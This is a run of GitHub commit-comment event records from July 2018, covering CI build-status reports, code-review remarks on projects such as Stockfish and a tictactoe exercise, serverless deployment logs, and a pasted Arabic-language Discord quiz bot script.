href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d59ae2e7ba967b2484c8ca60822fabcd6c5ebadf-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.21%25-green.png)</a>\n"}},"created_at":"2018-07-15T05:01:48Z"}
{"id":"7966815687","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29711377,"position":null,"line":null,"path":null,"commit_id":"d59ae2e7ba967b2484c8ca60822fabcd6c5ebadf","created_at":"2018-07-15T05:03:14Z","updated_at":"2018-07-15T05:03:14Z","author_association":"NONE","body":"#158531941-VerticalVenetianBlindCoefficients (Unknown) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d59ae2e7ba967b2484c8ca60822fabcd6c5ebadf-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-15T05:03:14Z"}
{"id":"7966823227","type":"CommitCommentEvent","actor":{"login":"fahrian086"},"repo":{"name":"Gendjex/vipro2"},"payload":{"comment":{"id":29711388,"position":48,"line":165,"path":"hakan.py","commit_id":"f7b8a47832fdd676d503cb9e1fa6c8d6911ae96f","created_at":"2018-07-15T05:12:02Z","updated_at":"2018-07-15T05:12:02Z","author_association":"NONE","body":"naiS"}},"created_at":"2018-07-15T05:12:02Z"}
{"id":"7966827146","type":"CommitCommentEvent","actor":{"login":"Narendra955"},"repo":{"name":"Narendra955/pom"},"payload":{"comment":{"id":29711396,"position":null,"line":null,"path":null,"commit_id":"5a2d39f68848b42d2a644975bd837c183a88d130","created_at":"2018-07-15T05:16:22Z","updated_at":"2018-07-15T05:16:22Z","author_association":"OWNER","body":"sfgs"}},"created_at":"2018-07-15T05:16:22Z"}
{"id":"7966827920","type":"CommitCommentEvent","actor":{"login":"EddieChoCho"},"repo":{"name":"loui123/MineSweeperSample"},"payload":{"comment":{"id":29711397,"position":17,"line":17,"path":"src/test/java/com/loui/spring/service/JsonUtilTest.java","commit_id":"96304bb96e817cd3ec70bf13b3677ea20519c71a","created_at":"2018-07-15T05:17:14Z","updated_at":"2018-07-15T05:17:14Z","author_association":"NONE","body":"Since GeneralResponse is stateless, you don't need to initialize it for each case."}},"created_at":"2018-07-15T05:17:14Z"}
{"id":"7966828202","type":"CommitCommentEvent","actor":{"login":"tomtor"},"repo":{"name":"protonspring/Stockfish"},"payload":{"comment":{"id":29711398,"position":null,"line":null,"path":null,"commit_id":"6e13032ece94a8519cd3331bc2c50cb8ad52e433","created_at":"2018-07-15T05:17:33Z","updated_at":"2018-07-15T05:17:33Z","author_association":"NONE","body":"[0,4] instead of [-3.1]?"}},"created_at":"2018-07-15T05:17:33Z"}
{"id":"7966828614","type":"CommitCommentEvent","actor":{"login":"StudentBlake"},"repo":{"name":"gibaBR/XCI-Organizer"},"payload":{"comment":{"id":29711400,"position":null,"line":null,"path":null,"commit_id":"426f5844f022659de648494e64fd07a063b6ecc1","created_at":"2018-07-15T05:18:05Z","updated_at":"2018-07-15T05:18:05Z","author_association":"CONTRIBUTOR","body":"Check out the new commits. I have switched to PackageID. The cache now only consists of the PackageID and TitleID, so it's universal! Various other changes too."}},"created_at":"2018-07-15T05:18:05Z"}
{"id":"7966829119","type":"CommitCommentEvent","actor":{"login":"Alejandroa24"},"repo":{"name":"Alejandroa24/Proyectos2"},"payload":{"comment":{"id":29711401,"position":null,"line":null,"path":null,"commit_id":"65978deb1792c683579b789a610a08ed26723429","created_at":"2018-07-15T05:18:35Z","updated_at":"2018-07-15T05:18:35Z","author_association":"OWNER","body":"Codificación de entrada"}},"created_at":"2018-07-15T05:18:35Z"}
{"id":"7966830388","type":"CommitCommentEvent","actor":{"login":"protonspring"},"repo":{"name":"protonspring/Stockfish"},"payload":{"comment":{"id":29711403,"position":null,"line":null,"path":null,"commit_id":"6e13032ece94a8519cd3331bc2c50cb8ad52e433","created_at":"2018-07-15T05:19:50Z","updated_at":"2018-07-15T05:19:50Z","author_association":"OWNER","body":"I never know what the rule is.  Seems like -3,1, because I'm simply\nremoving the popcount.\nThere is no new logic or code additions.\n\nOn Sat, Jul 14, 2018 at 11:17 PM, Tom Vijlbrief <notifications@github.com>\nwrote:\n\n> [0,4] instead of [-3.1]?\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/protonspring/Stockfish/commit/6e13032ece94a8519cd3331bc2c50cb8ad52e433#commitcomment-29711398>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AcVnSJqCYllwAblSFydCXTls4OSYuU2mks5uGtBtgaJpZM4VQHkp>\n> .\n>\n\n\n\n-- \nMichael T. Whiteley\nmobile: 801.707.6886\n"}},"created_at":"2018-07-15T05:19:50Z"}
{"id":"7966832712","type":"CommitCommentEvent","actor":{"login":"tomtor"},"repo":{"name":"protonspring/Stockfish"},"payload":{"comment":{"id":29711406,"position":null,"line":null,"path":null,"commit_id":"6e13032ece94a8519cd3331bc2c50cb8ad52e433","created_at":"2018-07-15T05:22:30Z","updated_at":"2018-07-15T05:22:30Z","author_association":"NONE","body":"There is a new 'if' "}},"created_at":"2018-07-15T05:22:30Z"}
{"id":"7966838701","type":"CommitCommentEvent","actor":{"login":"cryptocurrencyroger"},"repo":{"name":"cryptocurrencyroger/roger"},"payload":{"comment":{"id":29711417,"position":null,"line":null,"path":null,"commit_id":"a9e50986fd13e064837a5046b7d29d925ccd97a6","created_at":"2018-07-15T05:29:13Z","updated_at":"2018-07-15T05:29:13Z","author_association":"OWNER","body":"https://candybox.ai/aelf/account/register?invitationCode=0K3F3MbUfJcV"}},"created_at":"2018-07-15T05:29:13Z"}
{"id":"7966838789","type":"CommitCommentEvent","actor":{"login":"prokingvan"},"repo":{"name":"XCSoar/XCSoar"},"payload":{"comment":{"id":29711418,"position":null,"line":null,"path":null,"commit_id":"719cedbf614b037c75081fa86f7be3735fb0daf4","created_at":"2018-07-15T05:29:21Z","updated_at":"2018-07-15T05:29:21Z","author_association":"NONE","body":"I have translate to Chinese completed，and have made openvario ."}},"created_at":"2018-07-15T05:29:21Z"}
{"id":"7966840001","type":"CommitCommentEvent","actor":{"login":"r1ft4469"},"repo":{"name":"r1ft4469/docker-kali"},"payload":{"comment":{"id":29711422,"position":null,"line":null,"path":null,"commit_id":"6b5caa93fb8157a974776843f7c681fc4979b6a7","created_at":"2018-07-15T05:30:40Z","updated_at":"2018-07-15T05:30:40Z","author_association":"OWNER","body":"Thinking about trying to get a full powerline then there if possible may have to code it in ruby and imort the function though."}},"created_at":"2018-07-15T05:30:40Z"}
{"id":"7966840270","type":"CommitCommentEvent","actor":{"login":"YOUSEF-IS-HERE"},"repo":{"name":"YOUSEF-IS-HERE/hggvbhrgfbgnhytrfvggammesdsdsdsdsd2212"},"payload":{"comment":{"id":29711423,"position":30,"line":30,"path":"bot.js","commit_id":"34807e1b7b81f6b75dd2078f36fa75f9e2f652f6","created_at":"2018-07-15T05:30:56Z","updated_at":"2018-07-15T05:30:56Z","author_association":"OWNER","body":"let points = JSON.parse(fs.readFileSync('points.json', 'utf8'));\r\nclient.on('message', message => {\r\n    if (!points[message.author.id]) points[message.author.id] = {points : 0}\r\n    if (message.content == 'rنقاطي'){\r\n        var embed = new RichEmbed()\r\n        .setAuthor(message.author.username,message.author.avatarURL)\r\n        .addField(`نقاطك : ${points[message.author.id].points}`,'by ra3ode',   true)\r\n        .setColor('RANDOM')\r\n        .setFooter('العاب وبس', client.user.avatarURL);\r\n        message.channel.sendEmbed(embed)\r\n    };\r\n    if (message.content == \"rفكك\") {    \r\n        var x = ['ضفدع', 'طيارة', 'رعودي', 'تفكيك', 'تجربة', 'مدرسة', 'معلم' , 'نقاط'];\r\n        var x2 = ['ض ف د ع', 'ط ي ا ر ة', 'ر ع و د ي', 'ت ف ك ي ك', 'ت ج ر ب ة', 'م د ر س ة', 'م ع ل م', 'ن ق ا ط'];\r\n        var x3 = Math.floor(Math.random()*x.length)\r\n        message.channel.send(`فكك الكلمة الآتية :${x[x3]}, لديك 20 ثانية`).then(msg1=> {\r\n            var r = message.channel.awaitMessages(msg => msg.content == x2[x3], {\r\n                maxMatches : 1,\r\n                time : 20000,\r\n                errors : ['time']\r\n            })\r\n        r.catch(() => {\r\n            return message.channel.send('❌ لقد انتهى الوقت ولم يقم أحد بالأجابة بشكل صحيح')\r\n                    message.channel.sendEmbed(embed)\r\n        })\r\n        r.then(s=> {\r\n\r\n            points[message.author.id].points +=1\r\n            message.channel.send(`✅ لقد قمت بكتابة الجواب الصحيح بالوقت المناسب\r\n ─═════**{نقاطك:${points[message.author.id].points}}**═════─`);\r\n               message.channel.sendEmbed(embed)\r\n        })\r\n        })\r\n    }\r\n    fs.writeFile('points.json', JSON.stringify(points), (err) => {\r\n        if (err) console.error(err);\r\n    })\r\n  if (message.content == \"rعواصم\") {\r\n        var x = ['اليمن', 'مصر', 'الجزائر', 'السعودية', 'الصومال', 'العراق' , 'الامارات' , 'سوريا'];\r\n        var x2 = ['صنعاء', 'القاهرة', 'الجزائر', 'الرياض', 'الخرطوم', 'بغداد', 'ابو ظبي','دمشق '];\r\n        var x3 = Math.floor(Math.random()*x.length)\r\n        message.channel.send(`ماهي عاصمة :${x[x3]}, لديك 15 ثانية`).then(msg1=> {\r\n            var r = message.channel.awaitMessages(msg => msg.content == x2[x3], {\r\n                maxMatches : 1, \r\n                time : 15000, \r\n                errors : ['time'] \r\n            })\r\n        r.catch(() => {\r\n            return message.channel.send('❌ لقد انتهى الوقت ولم يقم أحد بالأجابة بشكل صحيح') \r\n               message.channel.sendEmbed(embed)\r\n        })\r\n        r.then(s=> {\r\n\r\n            points[message.author.id].points +=1\r\n            message.channel.send(`✅ لقد قمت بكتابة الجواب الصحيح بالوقت المناسب\r\n ─═════**{نقاطك:${points[message.author.id].points}}**═════─`);\r\n               message.channel.sendEmbed(embed)\r\n        })\r\n        })\r\n    }\r\n    fs.writeFile('points.json', JSON.stringify(points), (err) => {\r\n        if (err) console.error(err);\r\n    })\r\n    if (message.content == \"rلغز\") {\r\n        var x = ['كلي ثقوب ومع ذلك أحفظ الماء فمن أكون ؟', 'ما هو الشيء الذي يمشي و يقف وليس له أرجـل ؟', 'ما هو الشئ الذي يرفع اثقال ولا يقدر يرفع مسمار ؟', 'يسمع بلا أذن ويتكلم بلا لسان فما هو ؟', 'ماهو الشيء الذي يكتب و لا يقرأ ؟', 'ماهو الشيء الذي يكون اخضر في الارض واسود في السوق واحمــر في البيت ؟', 'عائلة مؤلفة من 6 بنات وأخ لكل منهن، فكم عدد أفراد العائلة ؟', 'يتحرك دائماً حواليك لكنك لاتراه فما هو ؟' ,'ما هو البليون ؟'];\r\n        var x2 = ['الاسفنج', 'الساعة', 'البحر', 'التلفون', 'العمر', 'الشاي', 'سبعة اشخاص' ,'الهواء' ,'الف مليون'];\r\n        var x3 = Math.floor(Math.random()*x.length)\r\n        message.channel.send(`حل اللغز الأتي :${x[x3]}, لديك 20 ثانية`).then(msg1=> {\r\n            var r = message.channel.awaitMessages(msg => msg.content == x2[x3], {\r\n                maxMatches : 1,\r\n                time : 20000,\r\n                errors : ['time']\r\n            })\r\n        r.catch(() => {\r\n            return message.channel.send('❌ لقد انتهى الوقت ولم يقم أحد بالأجابة بشكل صحيح') \r\n               message.channel.sendEmbed(embed)\r\n        })\r\n        r.then(s=> {\r\n\r\n            points[message.author.id].points +=1\r\n            message.channel.send(`✅ لقد قمت بكتابة الجواب الصحيح بالوقت المناسب\r\n ─═════**{نقاطك:${points[message.author.id].points}}**═════─`);\r\n               message.channel.sendEmbed(embed)\r\n        })\r\n        })\r\n    }\r\n    fs.writeFile('points.json', JSON.stringify(points), (err) => {\r\n        if (err) console.error(err);\r\n    })\r\n  if (message.content == \"rتحدي\") {    \r\n        var x = ['ف ض ع د', 'ص ش خ', 'ة د ا ر ج', 'ا ر ي ة س', 'ي ت ب', 'ئ ا ع ل ة', ' ا ش ي', 'ن ح و ي ا', 'س د و ي ك ر د', 'ر ط ي ا ة' , 'ن ح ز ل و'];\r\n        var x2 = ['ضفدع', 'شخص', 'دراجة', 'سيارة', 'بيت', 'عائلة', 'شاي', 'حيوان', 'ديسكورد', 'طيارة', 'حلزون'];\r\n        var x3 = Math.floor(Math.random()*x.length)\r\n        message.channel.send(`عدل الكلمة الأتية :${x[x3]}, لديك 25 ثانية`).then(msg1=> {\r\n            var r = message.channel.awaitMessages(msg => msg.content == x2[x3], {\r\n                maxMatches : 1,\r\n                time : 25000,\r\n                errors : ['time']\r\n            })\r\n        r.catch(() => {\r\n            return message.channel.send('❌ لقد انتهى الوقت ولم يقم أحد بالأجابة بشكل صحيح')\r\n                    message.channel.sendEmbed(embed)\r\n        })\r\n        r.then(s=> {\r\n\r\n            points[message.author.id].points +=1\r\n            message.channel.send(`✅ لقد قمت بكتابة الجواب الصحيح بالوقت المناسب\r\n ─═════**{نقاطك:${points[message.author.id].points}}**═════─`);\r\n               message.channel.sendEmbed(embed)\r\n        })\r\n        })\r\n    }\r\n    fs.writeFile('points.json', JSON.stringify(points), (err) => {\r\n        if (err) console.error(err);\r\n    });\r\n\r\n"}},"created_at":"2018-07-15T05:30:56Z"}
{"id":"7966840969","type":"CommitCommentEvent","actor":{"login":"MVsualStdio"},"repo":{"name":"MVsualStdio/Hello-Word"},"payload":{"comment":{"id":29711424,"position":1,"line":1,"path":"README.md","commit_id":"6f4c871677acccf1361b1bdbeaa7ac70886d6ab3","created_at":"2018-07-15T05:31:49Z","updated_at":"2018-07-15T05:31:49Z","author_association":"OWNER","body":"this is a new world ."}},"created_at":"2018-07-15T05:31:49Z"}
{"id":"7966841449","type":"CommitCommentEvent","actor":{"login":"MVsualStdio"},"repo":{"name":"MVsualStdio/Hello-Word"},"payload":{"comment":{"id":29711427,"position":null,"line":null,"path":null,"commit_id":"6f4c871677acccf1361b1bdbeaa7ac70886d6ab3","created_at":"2018-07-15T05:32:24Z","updated_at":"2018-07-15T05:32:24Z","author_association":"OWNER","body":"moon"}},"created_at":"2018-07-15T05:32:24Z"}
{"id":"7966841771","type":"CommitCommentEvent","actor":{"login":"idsb3t1"},"repo":{"name":"idsb3t1/UI-ys1int-KEEP-TC"},"payload":{"comment":{"id":29711428,"position":null,"line":null,"path":null,"commit_id":"a1c7a4576e72c9414cf27e6810b63aa3476ca9af","created_at":"2018-07-15T05:32:49Z","updated_at":"2018-07-15T05:32:49Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.stage1.bluemix.net/devops/toolchains/ee7af0c7-eb4b-4808-84ae-65a1ebf892f4?env_id=ibm%3Ays1%3Aus-south \"UI-ys1int-KEEP-TC\"): [Delivery Pipeline](https://console.stage1.bluemix.net/devops/pipelines/9602ba9a-db4c-42c8-81d1-69655e515efe?env_id=ibm%3Ays1%3Aus-south \"UI-ys1int-KEEP-TC\") deployed [UI-ys1int-KEEP-TC](https://github.com/idsb3t1/UI-ys1int-KEEP-TC/releases/tag/deploy-ibm-ys1-us-south-idsb3t2-us.ibm.com-dev-20180715-053248 \"deploy-ibm-ys1-us-south-idsb3t2-us.ibm.com-dev-20180715-053248\") to [dev](https://console.stage1.bluemix.net/apps/e0173942-fbb5-42df-a8ff-cca49f037241?env_id=ibm:ys1:us-south \"ibm:ys1:us-south:idsb3t2@us.ibm.com:dev\"), including this commit"}},"created_at":"2018-07-15T05:32:49Z"}
{"id":"7966843512","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"drewyh/EnergyPlus"},"payload":{"comment":{"id":29711429,"position":null,"line":null,"path":null,"commit_id":"7128b1fcff620f11c2ba8476bd9d3311fa88d5e0","created_at":"2018-07-15T05:35:00Z","updated_at":"2018-07-15T05:35:00Z","author_association":"NONE","body":"use_eigen_HeatBalanceIntRadExchange (drewyh) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2964 of 2964 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7128b1fcff620f11c2ba8476bd9d3311fa88d5e0-PR6737-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7128b1fcff620f11c2ba8476bd9d3311fa88d5e0-PR6737-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-15T05:35:00Z"}
{"id":"7966843554","type":"CommitCommentEvent","actor":{"login":"Manuel-777"},"repo":{"name":"Manuel-777/MTG-Arena-Tool"},"payload":{"comment":{"id":29711430,"position":null,"line":null,"path":null,"commit_id":"6a35cf3b4db294a6b91185f7b7f8669fc12b529a","created_at":"2018-07-15T05:35:03Z","updated_at":"2018-07-15T05:35:03Z","author_association":"OWNER","body":"Fixes: #16 , #12 and #15 "}},"created_at":"2018-07-15T05:35:03Z"}
{"id":"7966844604","type":"CommitCommentEvent","actor":{"login":"flavius"},"repo":{"name":"wolfenste/tictactoe"},"payload":{"comment":{"id":29711433,"position":null,"line":null,"path":null,"commit_id":"2c6f183b1c45b7834e5681e34711331879719a7f","created_at":"2018-07-15T05:36:17Z","updated_at":"2018-07-15T05:36:17Z","author_association":"NONE","body":"Empty tests are useless.\r\n\r\nYou should write a proper integration test first. Commit it, push it. We review then. When all looks reasonably well, you continue with writing production code. And the first step in writing production code would be creating empty production classes."}},"created_at":"2018-07-15T05:36:17Z"}
{"id":"7966845211","type":"CommitCommentEvent","actor":{"login":"flavius"},"repo":{"name":"wolfenste/tictactoe"},"payload":{"comment":{"id":29711434,"position":null,"line":null,"path":null,"commit_id":"2c6f183b1c45b7834e5681e34711331879719a7f","created_at":"2018-07-15T05:37:03Z","updated_at":"2018-07-15T05:37:03Z","author_association":"NONE","body":"Remove all tests. Create one or a few tests - meaning with testing code in them."}},"created_at":"2018-07-15T05:37:03Z"}
{"id":"7966847047","type":"CommitCommentEvent","actor":{"login":"sp193"},"repo":{"name":"ps2dev/ps2sdk"},"payload":{"comment":{"id":29711437,"position":null,"line":null,"path":null,"commit_id":"381ba628ca72c565da2b0ce3a7928931f31b15c1","created_at":"2018-07-15T05:39:11Z","updated_at":"2018-07-15T05:39:11Z","author_association":"MEMBER","body":"Original Post is mirrored here: http://lukasz.dk/mirror/forums.ps2dev.org/viewtopicc4cd.html?t=12272\r\nI seemed to have the same problem before: http://psx-scene.com/forums/f19/usb-mass-device-driver-usbhdfsd-compatibility-fix-some-usb-devices-73420/\r\n\r\nAll (at least, all that I have seen so far) of our timeout values are different from the IRX that I have."}},"created_at":"2018-07-15T05:39:11Z"}
{"id":"7966847382","type":"CommitCommentEvent","actor":{"login":"datakurre"},"repo":{"name":"collective/gatsby-source-plone"},"payload":{"comment":{"id":29711438,"position":null,"line":null,"path":null,"commit_id":"5b2138f9593138b356ad206fee86f3326f3b335f","created_at":"2018-07-15T05:39:35Z","updated_at":"2018-07-15T05:39:35Z","author_association":"COLLABORATOR","body":"@ajayns We should figure out a way to start testing functions in gatsby-node.js to make similar regression easier to spot in the future. We could do tests that require Plone site to be running, but even better would be if our tests could use the JSON files from tests/gatsby-starter-default/fixture without requiring Plone site to be running.\r\n\r\nLuckily our acceptance tests (tests/gatsby-starter-default) have prevented all regression so far :)"}},"created_at":"2018-07-15T05:39:35Z"}
{"id":"7966847623","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"drewyh/EnergyPlus"},"payload":{"comment":{"id":29711439,"position":null,"line":null,"path":null,"commit_id":"7128b1fcff620f11c2ba8476bd9d3311fa88d5e0","created_at":"2018-07-15T05:39:56Z","updated_at":"2018-07-15T05:39:56Z","author_association":"NONE","body":"use_eigen_HeatBalanceIntRadExchange (drewyh) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7128b1fcff620f11c2ba8476bd9d3311fa88d5e0-PR6737-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-15T05:39:56Z"}
{"id":"7966848412","type":"CommitCommentEvent","actor":{"login":"astro"},"repo":{"name":"jonwingfield/embedded-nrf24l01"},"payload":{"comment":{"id":29711440,"position":null,"line":null,"path":null,"commit_id":"b7c022f348bcd095448602bd5342f4487830e70c","created_at":"2018-07-15T05:40:48Z","updated_at":"2018-07-15T05:40:48Z","author_association":"NONE","body":"Should I review and merge your changes?"}},"created_at":"2018-07-15T05:40:48Z"}
{"id":"7966848696","type":"CommitCommentEvent","actor":{"login":"ledlamp"},"repo":{"name":"ledlamp/discord-mpp-bridge"},"payload":{"comment":{"id":29711441,"position":null,"line":null,"path":null,"commit_id":"a01a2933df5e18b2f5aecbea254e407b90b3da3e","created_at":"2018-07-15T05:41:09Z","updated_at":"2018-07-15T05:41:09Z","author_association":"OWNER","body":"h"}},"created_at":"2018-07-15T05:41:09Z"}
{"id":"7966851671","type":"CommitCommentEvent","actor":{"login":"protonspring"},"repo":{"name":"protonspring/Stockfish"},"payload":{"comment":{"id":29711445,"position":null,"line":null,"path":null,"commit_id":"6e13032ece94a8519cd3331bc2c50cb8ad52e433","created_at":"2018-07-15T05:43:56Z","updated_at":"2018-07-15T05:43:56Z","author_association":"OWNER","body":"I updated the branch.  Is that now a simplification?\r\n\r\nscore += KnightOnQueen * bool(attackedBy[Us][KNIGHT] & pos.attacks_from<KNIGHT>(s) & safeThreats);"}},"created_at":"2018-07-15T05:43:56Z"}
{"id":"7966852019","type":"CommitCommentEvent","actor":{"login":"gtm-agent"},"repo":{"name":"zotoio/serverless-central"},"payload":{"comment":{"id":29711446,"position":null,"line":null,"path":null,"commit_id":"4627e9bbdee9ce87e2dd5a882380cb6ae8a9ce02","created_at":"2018-07-15T05:44:17Z","updated_at":"2018-07-15T05:44:17Z","author_association":"NONE","body":"### Results for event id: 16a99e25-79a8-43cd-8f0d-622a48bf6963\n<details><summary>DockerServerless : Deploy to Lambda (4f82fb) Execution completed.</summary>\n<p>\n\n**output tail (303 lines total):**\n\n```\n...\nstage: dev\nregion: ap-southeast-2\nstack: sample-http-dev\napi keys:\n  None\nendpoints:\n  GET - https://yeajzvl29j.execute-api.ap-southeast-2.amazonaws.com/dev/sample-http\nfunctions:\n  sample-http: sample-http-dev-sample-http\n\nStack Outputs\nSampleDashhttpLambdaFunctionArn: arn:aws:lambda:ap-southeast-2:347186442473:function:sample-http-dev-sample-http\nApiGatewayRestApiRootResource: q643s5bj1a\nApiGatewayRestApi: yeajzvl29j\nServiceEndpoint: https://yeajzvl29j.execute-api.ap-southeast-2.amazonaws.com/dev\nServerlessDeploymentBucketName: io.zoto.serverless.dev\nServerlessAliasReference: REFERENCE\n\nDone in 92.14s.\nApiGateway Endpoints:\n  GET - https://yeajzvl29j.execute-api.ap-southeast-2.amazonaws.com/master/sample-http\nSuccess:  sample-http\nALL DEPLOYS SUCCESSFUL\n>>> packaging deployment output: 16a99e25-79a8-43cd-8f0d-622a48bf6963-output.tar.gz from output dir..\n>>> uploading output to s3://gtmstorage4/output/16a99e25-79a8-43cd-8f0d-622a48bf6963-output.tar.gz\n{\n    \"ETag\": \"\\\"4d52ea79cae0c51324be187b02eeab17\\\"\"\n}\nExecution time was 128 seconds.\n\n```\n\n\nhttps://github.com/apocas/dockerode</p></details>"}},"created_at":"2018-07-15T05:44:17Z"}
{"id":"7966854781","type":"CommitCommentEvent","actor":{"login":"gtm-agent"},"repo":{"name":"zotoio/serverless-central"},"payload":{"comment":{"id":29711453,"position":null,"line":null,"path":null,"commit_id":"07fc91e289a7c79c0710dc54720c69c777ed2c74","created_at":"2018-07-15T05:47:31Z","updated_at":"2018-07-15T05:47:31Z","author_association":"NONE","body":"### Results for event id: a6d5e95e-a2e8-4cee-af2e-5407101b5d16\n<details><summary>DockerServerless : Deploy to Lambda (891358) Docker output validation failed for outputRegex</summary>\n<p>\n\n**output tail (63 lines total):**\n\n```\n...\n    \"ContentLength\": 60178954, \n    \"ETag\": \"\\\"dd43d38c0a6e94bbc1a3f418295bb50b\\\"\", \n    \"Metadata\": {}\n}\n>>> unpacking deps-187a55dd2655dbd8da6204eb9d1f36ae.tar.gz to /usr/workspace/clone/node_modules\n>>> running custom build commmand..\nyarn install v1.7.0\nverbose 0.35 Checking for configuration file \"/usr/workspace/clone/.npmrc\".\nverbose 0.354 Checking for configuration file \"/usr/local/share/.npmrc\".\nverbose 0.354 Checking for configuration file \"/root/.nvm/versions/node/v8.11.1/etc/npmrc\".\nverbose 0.355 Checking for configuration file \"/root/.npmrc\".\nverbose 0.36 Checking for configuration file \"/usr/workspace/clone/.npmrc\".\nverbose 0.361 Checking for configuration file \"/usr/workspace/.npmrc\".\nverbose 0.362 Checking for configuration file \"/usr/.npmrc\".\nverbose 0.363 Checking for configuration file \"/usr/workspace/clone/.yarnrc\".\nverbose 0.363 Checking for configuration file \"/usr/local/share/.yarnrc\".\nverbose 0.363 Checking for configuration file \"/root/.nvm/versions/node/v8.11.1/etc/yarnrc\".\nverbose 0.364 Checking for configuration file \"/root/.yarnrc\".\nverbose 0.364 Checking for configuration file \"/usr/workspace/clone/.yarnrc\".\nverbose 0.364 Checking for configuration file \"/usr/workspace/.yarnrc\".\nverbose 0.364 Checking for configuration file \"/usr/.yarnrc\".\nverbose 0.375 current time: 2018-07-15T05:47:48.228Z\n[1/4] Resolving packages...\nsuccess Already up-to-date.\nDone in 1.05s.\nDEPS_FOUND=true\nno package deploys directly required\nAT LEAST ONE PACKAGE DEPLOYMENT FAILED\nExecution time was 23 seconds.\n\n```\n\n\nhttps://github.com/apocas/dockerode</p></details>"}},"created_at":"2018-07-15T05:47:31Z"}
{"id":"7966855328","type":"CommitCommentEvent","actor":{"login":"ElijahLynn"},"repo":{"name":"ElijahLynn/pantheon-d8-composer-project-elijah"},"payload":{"comment":{"id":29711454,"position":null,"line":null,"path":null,"commit_id":"58fa3d5fae0b228e8eb82f00431c729aff1faa21","created_at":"2018-07-15T05:48:13Z","updated_at":"2018-07-15T05:48:13Z","author_association":"OWNER","body":"Created multidev environment [pantheon-d8-composer-project-elijah#ci-14](https://dashboard.pantheon.io/sites/6e332848-a68a-42aa-9fb5-563febca7197#ci-14).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-14-pantheon-d8-composer-project-elijah.pantheonsite.io/)"}},"created_at":"2018-07-15T05:48:13Z"}
{"id":"7966857558","type":"CommitCommentEvent","actor":{"login":"gtm-agent"},"repo":{"name":"zotoio/serverless-central"},"payload":{"comment":{"id":29711460,"position":null,"line":null,"path":null,"commit_id":"a5c4ad3b9b76ef087d40ce18e17baec80cbe4f42","created_at":"2018-07-15T05:50:46Z","updated_at":"2018-07-15T05:50:46Z","author_association":"NONE","body":"### Results for event id: 8b7ce4fa-0e21-4689-a347-029de41a7898\n<details><summary>DockerServerless : Deploy to Lambda (891358) Execution completed.</summary>\n<p>\n\n**output tail (297 lines total):**\n\n```\n...\nregion: ap-southeast-2\nstack: sample-http-dev\napi keys:\n  None\nendpoints:\n  GET - https://yeajzvl29j.execute-api.ap-southeast-2.amazonaws.com/dev/sample-http\nfunctions:\n  sample-http: sample-http-dev-sample-http\n\nStack Outputs\nSampleDashhttpLambdaFunctionArn: arn:aws:lambda:ap-southeast-2:347186442473:function:sample-http-dev-sample-http\nApiGatewayRestApiRootResource: q643s5bj1a\nApiGatewayRestApi: yeajzvl29j\nServiceEndpoint: https://yeajzvl29j.execute-api.ap-southeast-2.amazonaws.com/dev\nServerlessDeploymentBucketName: io.zoto.serverless.dev\nServerlessAliasReference: REFERENCE\n\nServerless: Removing old service artifacts from S3...\nDone in 70.00s.\nApiGateway Endpoints:\n  GET - https://yeajzvl29j.execute-api.ap-southeast-2.amazonaws.com/master/sample-http\nSuccess:  sample-http\nALL DEPLOYS SUCCESSFUL\n>>> packaging deployment output: 8b7ce4fa-0e21-4689-a347-029de41a7898-output.tar.gz from output dir..\n>>> uploading output to s3://gtmstorage4/output/8b7ce4fa-0e21-4689-a347-029de41a7898-output.tar.gz\n{\n    \"ETag\": \"\\\"20cf84e031264b2751071ddb9f38c37a\\\"\"\n}\nExecution time was 120 seconds.\n\n```\n\n\nhttps://github.com/apocas/dockerode</p></details>"}},"created_at":"2018-07-15T05:50:46Z"}
{"id":"7966858348","type":"CommitCommentEvent","actor":{"login":"tomtor"},"repo":{"name":"protonspring/Stockfish"},"payload":{"comment":{"id":29711461,"position":null,"line":null,"path":null,"commit_id":"6e13032ece94a8519cd3331bc2c50cb8ad52e433","created_at":"2018-07-15T05:51:43Z","updated_at":"2018-07-15T05:51:43Z","author_association":"NONE","body":"Resulting machine code will still be similar so [0,4] IMO"}},"created_at":"2018-07-15T05:51:43Z"}
